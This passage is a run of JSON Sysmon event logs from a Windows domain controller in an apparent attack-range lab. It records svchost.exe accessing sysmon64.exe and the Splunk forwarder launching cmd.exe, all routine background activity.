4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.725\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-001042600300}\r\nProcessId: 3708\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.725","ProcessGuid":"{A837DB8D-01C6-5F25-0000-001042600300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
